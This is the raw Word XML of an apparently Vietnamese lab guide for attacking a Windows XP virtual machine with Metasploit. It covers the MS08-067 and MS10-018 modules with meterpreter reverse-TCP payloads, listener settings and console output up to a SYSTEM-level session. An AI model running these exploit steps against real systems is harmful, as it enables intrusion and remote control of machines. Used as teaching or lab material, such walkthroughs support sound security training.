    <w:p w14:paraId="047C7193" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t>msf6 exploit(ms08_067_netapi) &gt; sessions -i &lt;ID&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351DB586" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc145594625"/>
      <w:bookmarkStart w:id="12" w:name="_Toc191141269"/>
      <w:r>
        <w:t>Truy xuất từ xa đến máy Windows XP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="4FC99418" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r>
        <w:t>Dùng chức năng VNC của MobaXterm hoặc chức năng Remote Desktop của Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03434253" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F1EBC18" wp14:editId="2922950D">
            <wp:extent cx="5940427" cy="2662704"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1684306191" name="Picture 16843061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306191"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect b="41263"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940427" cy="2662704"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46542951" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r>
        <w:t>Địa chỉ: wandertour.ddns.net, cổng: 5110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C1E6FD" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="00E03BC3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EBCCD45" wp14:editId="1C1B96BA">
            <wp:extent cx="5940425" cy="3732530"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1270"/>
            <wp:docPr id="1467538610" name="Picture 14675386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38610" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940425" cy="3732530"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC74B3C" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc145594626"/>
      <w:r>
        <w:t>NOTE các lệnh chính</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="6A9DEFAC" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>ping 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48008023" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>sudo nmap -v -A 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564092B5" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06491B59" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t>use exploit/windows/smb/ms08_067_netapi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAAE6E5" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t>set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6068B68E" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t>set LHOST 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C305DD9" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>set LPORT 4252</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568D15C3" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t>set target 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D88C210" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>set RHOSTS 192</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:t>.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0289D30E" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7281A5" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc145594627"/>
      <w:r>
        <w:t xml:space="preserve">Tấn </w:t>
      </w:r>
      <w:r w:rsidRPr="3CE16CD3">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>công Windows XP: ms10_018</w:t>
      </w:r>
      <w:r>
        <w:t>_ie_behaviors</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="4FE494AC" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>// Nếu đã chạy msf6 thì không cần chạy lại lệnh sudo msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F287376" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>user@vmkali:~$ cd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE23BB4" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>user@vmkali:~$ sudo msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1926F6" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EF8522E" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 &gt; back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77758BFE" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 &gt; ping 192.168.1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738894F1" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>msf6 &gt; use windows/browser/ms10_018_ie_behaviors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C6E38D" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 exploit(ms10_018_ie_behaviors) &gt; set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1477C2" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 exploit(ms10_018_ie_behaviors) &gt; set LHOST 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324317A8" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 exploit(ms10_018_ie_behaviors) &gt; set L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>PORT</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>4040</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EF5B20" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0E33AEE1">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 exploit(ms10_018_ie_behaviors) &gt; set URIPATH /testXYZ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4387C553" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0E33AEE1">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 exploit(ms10_018_ie_behaviors) &gt; set RHOST 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA9CDCE" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0E33AEE1">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 exploit(ms10_018_ie_behaviors) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F492AB4" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Exploit running as background job 4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F8378B" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Exploit completed, but no session was created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2177CEF4" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4B18FF" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Started reverse TCP handler on 192.168.1.10:4141</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380AA483" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Using URL: http://192.168.1.10:8080/testXYZ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B560012" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r>
        <w:t>msf6 exploit(windows/browser/ms10_018_ie_behaviors) &gt; [*] Server started.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4D7B24" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69721C0F" wp14:editId="59AB5805">
            <wp:extent cx="5943600" cy="1219200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1087775417" name="Picture 108777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14:paraId="207A14A8" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06773F2F" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27BFB2DC" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r>
        <w:t>Dùng chức năng VNC của MobaXterm hoặc chức năng Remote Desktop của Windows để truy xuất từ xa đến máy WinXP 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003D7206" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D5C993A" wp14:editId="046EFEA5">
            <wp:extent cx="5940427" cy="2166447"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1756353188" name="Picture 16843061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306191"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect b="52210"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940427" cy="2166447"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="504C0A53" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r>
        <w:t>Địa chỉ: wandertour.ddns.net, cổng: 5110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1034EA33" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r>
        <w:t>Khi vào HĐH WinXP, chạy trình duyệt, gõ URL: http://192.168.1.10/testXYZ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5909526F" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trên msfconsole sẽ xuất hiện: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AC5719" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F962DB4" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r>
        <w:t>[*] 192.168.1.111    ms10_018_ie_behaviors - Sending MS10-018 Microsoft Internet Explorer DHTML Beh           aviors Use After Free (target: IE 6 SP0-SP2 (onclick))...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F642124" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Sending stage (175686 bytes) to 192.168.1.111</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F58383F" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Session ID 1 (192.168.1.10:4141 -&gt; 192.168.1.111:1796) processing InitialAutoRunScript 'post/wi           ndows/manage/priv_migrate'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06729E62" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Current session process is iexplore.exe (1236) as: WINXP111\Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7632D2BD" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Session is Admin but not System.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CBA542" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Will attempt to migrate to specified System level process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8F8D8D" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>[*] Trying services.exe (708)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27361305" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r>
        <w:t>[+] Successfully migrated to services.exe (708) as: NT AUTHORITY\SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60847484" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0E33AEE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Meterpreter session 1 opened (192.168.1.10:4141 -&gt; 192.168.1.110:1796) at 2024-08-22 08:55:11 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5476D3A7" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r>
        <w:t>msf6 exploit(windows/browser/ms10_018_ie_behaviors) &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA2967D" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11743E09" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>msf6 exploit(ms10_018_ie_behaviors) &gt; show sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337CA63A" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0E33AEE1">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5001D96F" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="312BB8BD" wp14:editId="755AF85C">
            <wp:extent cx="5943600" cy="2676525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="448401580" name="Picture 44840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71FF5369" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2FC60C" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>msf6 exploit(ms10_018_ie_behaviors) &gt; sessions -i 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CDB193" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>[*] Starting interaction with 1...</w:t>
